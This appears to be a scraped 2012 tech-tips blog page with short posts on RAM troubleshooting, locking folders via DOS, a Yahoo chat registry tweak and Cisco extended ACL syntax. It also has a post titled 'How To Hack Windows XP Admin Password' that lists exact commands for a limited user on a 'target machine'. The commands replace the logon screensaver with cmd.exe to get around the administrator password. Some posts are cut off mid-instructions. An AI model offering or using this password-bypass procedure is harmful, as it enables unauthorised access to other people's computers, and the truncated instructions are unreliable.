Pages

Braniac Bhai Headline Animator

Search This Blog

Feb 24, 2012


How to Troubleshoot RAM Memory


When you have memory problems, you know you are limited in your troubleshooting and hopefully you will be able to resolve the problem quickly. It’s a great idea to first verify the problem exist.

Shutdown and reboot your computer to see if the problem re-appears. Sometimes rebooting the PC will correct the problem and you'll be on your way.

Feb 23, 2012

How To Hack Windows XP Admin Password

How To Hack Windows XP Admin Password


If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Lock Any Folder Using DOS

Lock Any Folder Using DOS


Friends Hide your folders with out using any soft. just go to,

Start.....>

run.....>

cmd....>

note 1 "_" give 1 space on that place

note 2 ex:- if your folder is at D drive then

Kill Yahoo Chat Room Ads

Kill Yahoo Chat Room Ads...


Create a new text document, copy and paste the following...

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Yahoo\Pager\yurl]
"Finance Disclaimer"="http://msg.edit.yahoo.com/config/jlb"
"Chat Adurl"="http://chat.yahoo.com/c/msg/tabs.html?spaceid=21501837"

Doesn't matter what you name it, as long as you change it from .txt to .reg.

It works well with my Yahoo, should work the same for everyone else as well.

Feb 22, 2012

How to Configure Extended Access List On Router

Configure Extended Access Lists


An extended ACL gives you much more power than just a standard ACL. Extended IP ACLs check both the source and destination packet addresses. They can also check for specific protocols, port numbers, and other parameters, which allow administrators more flexibility and control.

access-list access-list-number {permit | deny}
protocol source source-wildcard [operator port]
destination destination-wildcard [operator port]
[established] [log]
 
Command Parameters Descriptions
access-list Main command
access-list-number Identifies the list using a number in the ranges of 100.199 or 2000. 2699.
permit | deny Indicates whether this entry allows or blocks the specified address.
protocol IP, TCP, UDP, ICMP, GRE, or IGRP.
source and destination Identifies source and destination IP addresses.
source-wildcard and destination-wildcard The operator can be lt (less than), gt (greater than), eq (equal to), or neq (not equal to). The port number referenced can be either the source port or the destination port, depending on where in the ACL the port number is configured. As an alternative to the port number, well-known application names can be used, such as Telnet, FTP, and SMTP.
established For inbound TCP only. Allows TCP traffic to pass if the packet is a response to an outbound-initiated session. This type of traffic has the acknowledgement (ACK) bits set. (See the Extended ACL with the Established Parameter example.)
log Sends a logging message to the console.